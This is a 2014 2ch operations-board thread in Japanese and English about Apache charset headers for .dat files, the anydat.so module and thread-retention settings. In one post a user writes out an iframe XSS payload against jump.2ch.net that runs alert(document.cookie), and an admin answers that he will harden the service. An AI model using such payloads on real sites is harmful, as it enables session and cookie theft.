Let's talk with Code Monkey-san Part.3

このエントリーをはてなブックマークに追加
60名無し編集部員
Hi, Code Monkey-san.

http://pele.bbspink.com/test/read.cgi/erobbs/1394106710/661
> Does anybody actually use it?

I am using ajax-powered read.cgi (read.html / read.js).
I am glad if anydat.so revives.

If it cannot be performed, I want you to correct a response header.
Then, a central problem will be solved.
Since a charset has a defect now, it is not operating normally.


Request:
[server]/[bbs]/dat/*.dat

Present response:
Content-Type: text/plain

Correct response:
Content-Type: text/plain; charset=Shift_JIS


Should this be set to Apache?
AddType "text/plain; charset=Shift_JIS" dat
61名無し編集部員:2014/03/23(日) 15:45:06.66 ID:toY1CwHk
質問・雑談スレ341@運用情報板
http://qb5.2ch.net/test/read.cgi/operate/1394704532/107-108,136-137,139

古いサーバーでモジュールが入っていなくても
User-Agent でヘッダーの返事を変更できるようにanydat.so を通していたのなら
今ならApache の設定だけで同じ事を実現可能なのかな?
62名無し編集部員:2014/03/23(日) 16:07:49.88 ID:aeqJXEv2
63Mango Mangue ★:2014/03/23(日) 20:26:22.08 ID:???
>>51
If it is original, how much is thread?
本来なら、いくつぐらいなのでしょうか?

Now, Although I can see only f22base.
現状、私はf22baseしか見られませんけれども。
64名無し編集部員:2014/03/23(日) 20:29:01.82 ID:WAE0Rp5G
>>63
f15が動いてないっぽいんじゃないかな
本来なら1分間隔でぶん回してdat落ちさせるはずだけど
65名無し編集部員:2014/03/23(日) 22:18:19.50 ID:99FmBLxR
>>63
スレ保持数は30か40ぐらいだったはずー
保持数やsambaや●使用時のTATESUGIの掃除はf22関連だったはずー
66trick:2014/03/23(日) 23:33:57.91 ID:z6RcicNp
>>64-65
f15も動いてるし>>51辺りのログを見ても200スレッドも無いんだけど勘違いなんじゃね?
今見ても保持数50無いくらいだし、正常だと思うけど。
67Mango Mangue ★:2014/03/24(月) 00:33:01.71 ID:???
>>65-66
先ほどは120-130ほどあったので、やはり間隔が広いのかもですね。
Since there were 120 to about 130 like the threads, it is whether an interval is large too.

このあたりは全板精査をして、一括管理したい。
I would carry out all the board scrutinization, and I will manage to all boards at f22base.
68trick:2014/03/24(月) 01:21:39.97 ID:MGYMj3Ay
しかしnews4vip並にスレ立ってるのに50位の保持数って凄いな。
それよかf22baseの方でdocomo_ad.txtが消されてるのはいいのかな?
69名無し編集部員:2014/03/24(月) 05:14:39.93 ID:oub818xY
圧縮はきちんとされてる
問題はsubject.txt
次々に書き込まれるのでf22が作ったsubject.txtがbbs.cgiが読み込んだ圧縮前のsubject.txtを基に作ったsubject.txtで上書きされちまうだけ
ちとわかりにくいな
70名無し編集部員:2014/03/24(月) 06:44:28.49 ID:A92cz7Zo
2ch operational information tentatively thread to talk with Jim because the rough
Could you please to BBS_JP_CHECK = 200 the http://qb5.2ch.net/operate?
Has the effect to make hesitate to write only a little to people having to worry about the IP exposed to since the detailed prefecture name to display in this set
And I think Jim's less likely to come to a thread to talk with Jim that's no good
71名無し編集部員:2014/03/24(月) 11:07:02.62 ID:koYGp1Rl
72名無し編集部員:2014/03/24(月) 11:25:56.18 ID:Eq+fa1Lx
im Ronin. but cannot evade BBQ
help me
73名無し編集部員:2014/03/24(月) 11:51:11.47 ID:koYGp1Rl
>>71を使いやすく
<iframe style="margin-left: -21em; width: 30em; height: 2em; overflow: hidden" src="http://jump.2ch.net/?javascript:alert%28document.cookie%29//__CLICK_HERE__"></iframe>
74Mango Mangue ★:2014/03/24(月) 11:59:26.93 ID:???
Rock54 Register-island:) has renewed now.
All the contents corresponded to BASIC Authentication.
75Code Monkey ★:2014/03/24(月) 13:22:49.12 ID:???
>>60
Okay setting that in Apache is reasonable.
I will ask Jim-san to do it. (Jim-san is responsible for apache config)

>>62
It has been removed. Sorry about that.

>>70
You need to talk with Jim-san or a settings volunteer to change the settings.

>>72
Please email me: [email protected]
I will help you personally.

>>71 >>73
I will harden the security of jump.2ch.net.
76名無し編集部員:2014/03/24(月) 14:33:33.39 ID:WqjzboXd
anydat.so does:
A: a workaround for IE6 behavior (using an XML container)
B: display partial contents of a thread in past archives
C: append HTTP response headers (charset and Cache-Control)

A may be ignored. (IE6 is obsolete nowadays)
B will be superseded by the new system.
C can be achieved by mod_mime and mod_headers:

AddCharset Shift_JIS dat # or as >>60
<Files *.dat>
Header merge Cache-Control max-age=5
</Files>

# to prevent stale contents being displayed,
# Cache-Control is also necessary.